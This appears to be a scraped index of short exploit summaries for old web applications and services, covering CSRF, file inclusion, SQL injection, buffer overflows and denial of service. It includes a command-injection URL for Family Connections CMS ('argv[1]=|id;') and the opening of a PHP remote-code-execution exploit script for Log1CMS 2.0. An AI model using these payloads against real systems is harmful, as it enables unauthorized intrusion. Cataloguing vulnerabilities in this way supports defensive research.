The Pixie v1.04 blog post feature is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can create a crafted webpage that tricks a logged-in user into submitting a form on behalf of the attacker. This can lead to unauthorized actions being performed by the user without their knowledge or consent.
The Basic Analysis and Security Engine (BASE) version <= 1.2.4 contains file inclusion vulnerabilities. An attacker can exploit them to include arbitrary files from remote servers, leading to potential remote code execution or information disclosure.
This exploit allows an attacker with upload rights and permissions to modify stories to execute arbitrary commands on the target system. The attacker can upload a file with a double extension and execute commands through it.
This exploit allows an attacker to execute commands remotely on Family Connections CMS v2.5.0-v2.7.1. The vulnerable code is in the './dev/less.php' file. The exploit takes advantage of the 'register_globals' and 'register_argc_argv' php.ini settings. The exploit URL is 'http://192.168.220.128/[path]/dev/less.php?argv[1]=|id;'
The WSN Classifieds script versions 6.2.12 and 6.2.18 are affected by multiple vulnerabilities, including Cross-Site Scripting (XSS) and SQL Injection. The XSS vulnerability allows an attacker to inject malicious scripts into the application, potentially leading to unauthorized access or data theft. The SQL Injection vulnerability allows an attacker to manipulate database queries, potentially leading to unauthorized access or data leakage.
Siemens Automation License Manager is vulnerable to a buffer overflow in the handling of the serialid field used in the *_licensekey commands, which can lead to code execution. Additionally, there are vulnerabilities that can be exploited to raise exceptions in the service.
This exploit allows an attacker to include arbitrary code from a remote location in the Nucleus CMS version 3.22 or earlier. The vulnerability exists in the PLUGINADMIN.php file in the nucleus/libs directory. The code checks for the existence of certain variables and includes them in the code execution process. By manipulating these variables, an attacker can execute arbitrary commands on the server.
+-----------------------------------------------------------+
+ Log1CMS 2.0(ajax_create_folder.php) Remote Code Execution +
+-----------------------------------------------------------+
Web-App : Log1CMS 2.0
Vendor : http://log1cms.sourceforge.net/
Vulnerability : Remote Code Execution
Author : Adel SBM
Website : www.The-code.tk
Facebook : http://www.facebook.com/profile.php?id=100002938082057
Google-Dork : "POWERED BY LOG1 CMS"
Tested on : Windows XP SP2
+-----------------------------------------------------------+
+ VIVE Algeria +
+-----------------------------------------------------------+
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("\n[-] No Response From {$host}:80\n");
    fwrite($sock, $packet);
    return stream_get_contents($sock);
}
print "\n+------------------------------------------------------------------------+";
print "\n| Log1CMS 2.0 Remote Code Execution Exploit by Adel SBM |";
print "\n| SPl ThanX To: EgiX(exploit founder end coder)-The DoN |";
print "\n| Greetz to: Over-X & ind0ushka .. |";
print "\n| TeaM Official website: www.The-code.tk |";
print "\n| VIVE Algeria |";
print "\n+------------------------------------------------------------------------+\n";
if ($argc < 3)
{
    print "\n+------------------------------------------------------------------------+";
    print "\n| Usage......: php $argv[0] <host> <path> |";
    print "\n| Example....: php $argv[0] localhost / |";
    print "\n| Example....: php $argv[0] localhost /log1cms/ |";
    print "\n+------------------------------------------------------------------------+\n";
}
This exploit triggers a denial of service vulnerability in the portmap service on Linux. By sending a specially crafted request, an attacker can cause the service to crash, resulting in a denial of service condition. This vulnerability has been tested on Linux with version 5.
This code exploits a remote stack-based buffer overflow in the DECT dissector of Wireshark. The ROP chains dynamically recover the stack address, mprotect it, and stack-pivot to shellcode located in the payload. The process is automated and bypasses any NX/ASLR.